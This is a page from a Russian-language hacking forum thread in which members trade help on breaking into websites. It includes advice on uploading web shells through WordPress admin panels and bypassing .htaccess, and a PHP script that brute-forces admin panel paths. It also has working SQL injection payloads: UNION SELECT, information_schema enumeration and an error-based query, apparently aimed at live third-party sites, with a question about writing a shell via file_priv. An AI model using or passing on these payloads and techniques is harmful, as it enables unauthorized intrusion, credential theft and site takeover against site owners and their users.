Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    del/
     
    #22261 Massay, 15 Jun 2013
    Last edited: 16 Jun 2013
  2. passwd

    passwd New Member

    Joined:
    23 Dec 2010
    Messages:
    78
    Likes Received:
    2
    Reputations:
    5
    Приветствую мужики! Есть доступ в админку WordPress. Заливаю шелл через Plugin Insallation. Смотрю в Library путь к этому шеллу. Захожу на него и получаю 403 You don't have permission to access... Почему такое происходит? И как решить данную проблему? Спасибо.
     
  3. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    потомучто в хтаккесс запрещен посиотр дериктории, залейся в корень $_SERVER['DOCUMENT_ROOT']
     
  4. passwd

    passwd New Member

    Joined:
    23 Dec 2010
    Messages:
    78
    Likes Received:
    2
    Reputations:
    5
    А как в другую директорию залить? Если вместе с темой, то она автоматом падает zip архивом в дефолтную папку. И лежит там простым архивчиком. Для установки темы нужен ftp пароль. В Media Settings убрал галочку с "Organize my uploads into month- and year-based folders". Начало заливать всё в wp-content/uploads, но оттуда так же 403 выдает. Мини шелл так же блокируется.
     
  5. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    зачем же так извращатся? залей через редактирование шаблона,
     
  6. passwd

    passwd New Member

    Joined:
    23 Dec 2010
    Messages:
    78
    Likes Received:
    2
    Reputations:
    5
    С удовольствием залил бы, но при редактировании шаблонов, и плагинов: "You need to make this file writable before you can save your changes."

    Так как залить в корень? Подскажет кто?
     
    #22266 passwd, 17 Jun 2013
    Last edited: 17 Jun 2013
  7. biaktrisa

    biaktrisa New Member

    Joined:
    31 Mar 2012
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    кто может помочь есть сайт (в личку) CMS Айсберг (если я правильно определил), в havaj 1.6 инъекция раскручивается нормально, но вот понять где в БД пароль хранится и хранится ли он вообще в БД не пойму. уже несколько дней изучаю их БД успехов ноль.
     
  8. biaktrisa

    biaktrisa New Member

    Joined:
    31 Mar 2012
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    сразу подумал об этом, но там только одна БД

    кстати вход в админку там через CPanel, может это как то поможет
     
    #22268 biaktrisa, 17 Jun 2013
    Last edited: 17 Jun 2013
  9. passwd

    passwd New Member

    Joined:
    23 Dec 2010
    Messages:
    78
    Likes Received:
    2
    Reputations:
    5
    А где их можно отредактировать? В "Permalink Settings"? Там ведь вроде только URL редактируются.
     
  10. passwd

    passwd New Member

    Joined:
    23 Dec 2010
    Messages:
    78
    Likes Received:
    2
    Reputations:
    5
    Cpanel - это не совсем админка сайта. Это что-то на подобие админки хостинга.
    Найти админку можешь с помощью такого php скрипта
    PHP:
    <?php
    set_time_limit
    (0);
    $name "admindic.txt"// База админок
    $adres "http://www.site.com"// Url без / в конце
    $file array_map("trim"file($name));
    $ch curl_init(); 
    foreach (
    $file as $line)
    {
        
    curl_setopt($chCURLOPT_URL$adres.$line); 
        
    curl_setopt($chCURLOPT_HEADERTRUE); 
        
    curl_setopt($chCURLOPT_RETURNTRANSFERTRUE); 
        
    $res curl_exec($ch); 
        if (
    preg_match("~^HTTP/\d.\d 2\d\d|^HTTP/\d.\d 3\d\d~"$res)) {
            echo 
    $line."<br>\r\n";
            
    flush();
            
    ob_flush();
        }
    }
    curl_close($ch);
    Только здесь нужна собственная коллекция админок =)
    По началу можешь пользовать эту:
    http://pastebin.com/NPxYRY1u

    А пароль и имя пользователя чаще всего хранятся в таблицах:
    user, users, admin, admin_users, login и т.д.
    Тебе же нужно просто просмотреть все таблицы и найти хоть что-то где может быть написано password, pwd, passwd.
    Так же посмотри на File_Priv. Если Y - можешь попробовать залить шелл и без пароля администратора, но здесь придется искать полный путь к директории на сервере. Ищи "Полный F.A.Q. по SQL injection" здесь на сайте.
     
    #22270 passwd, 17 Jun 2013
    Last edited: 17 Jun 2013
    K800 likes this.
  11. J.Z.

    J.Z. Member

    Joined:
    15 Dec 2012
    Messages:
    44
    Likes Received:
    8
    Reputations:
    0
    Получил доступ к админ панели одного сайта, пытаюсь залить шелл, нашел только одну папку в которую можно залить. Залил, казалось бы все ок. Пробую выполнить залитый шелл, вываливается такая шляпа:
    .htaccess'a в папке не лежит, кто что может предложить?
    P.s. любые файлы на пыхе работать категорически отказываются.
     
  12. biaktrisa

    biaktrisa New Member

    Joined:
    31 Mar 2012
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    эти пути уже давно пробил результат 0

    все найденные уже пробил, паролей 0 их вообще нет, хотя кое какие логины нашел
     
    #22272 biaktrisa, 18 Jun 2013
    Last edited by a moderator: 18 Jun 2013
  13. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    залей свой хтаккес с разришением выполнеения пыха в картинках


    значит сайт без админки, поетому и паролей нет
     
  14. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    523
    Likes Received:
    15
    Reputations:
    -4
    Есть сайт с уязвимым полем &id=5151

    Ставлю в конце ковычку одинарную &id=5151' - вот что получаю в ответ:

    MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1
    Query: SELECT `id`, `name`, `uniqum`, `image`, `catsID` FROM `ap_products` WHERE `enable`=1 AND `id` IN(0,5151')


    Есть исходный код данного участка кода:
    PHP:
    $sql 'SELECT `id`, `name`, `uniqum`, `image`, `catsID`,`in_stock`,`cant_buy` FROM `'.$DB_prefix.'products` WHERE `enable`=1 AND `id` IN (0,';
            foreach(
    $Basket AS $code => $bskt)
                
    $sql.= $code.',';
            
    $sql substr($sql,0,-1).')';
            
    $sql query($sql);
    Подскажите, как правильно составить запрос, чтобы выполнилась скуль?
     
  15. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    855
    Reputations:
    857
    Думаю, нужно попробовать так

    &id=5151)+and+1=2+union+select+111,222,333,444,555+--+

    Ну и понеслась...
     
    _________________________
  16. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    374
    Reputations:
    267
    Имеется сайт с sql injection вида:
    http://site/id/5
    Комменты не срабатывают. Пришлось проэксплуатировать баг так:
    http://site/id/5'and(mid(version(),1,1)=5)and'1
    Как все это дело автоматизировать в sqlmap? ЧПУ...
     
  17. Rurr

    Rurr New Member

    Joined:
    12 Jan 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    как правильно составить запрос в vBulletin 4.0.3 что бы получить префикс к таблицам?

    вот так ошибка в исходнике страници пишет что такой таблици не существует
     
  18. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    &cat[0]=1) union select table_name from information_schema.tables limit 0,1#

    и перебирай через limit пока свою таблицу не найдешь.
     
  19. Rurr

    Rurr New Member

    Joined:
    12 Jan 2013
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    а это не имя базы разве?
     
  20. Evil_Genius

    Evil_Genius Member

    Joined:
    3 Aug 2009
    Messages:
    523
    Likes Received:
    15
    Reputations:
    -4
    Есть скуль MySQL error based

    .php?avto=5+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,unhex(Hex(cast(user()+as+char))),0x27,0x7e))+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+1=1

    При таком запросе, вытает:
    Ошибка SQL запросаDuplicate entry '~'user_mysql@localhost'~1' for key 'group_key'

    Подскажите как правильно составить запрос чтобы залить напрямую шелл? Знаю полный путь и что file_priv = Y
     
Loading...
Thread Status:
Not open for further replies.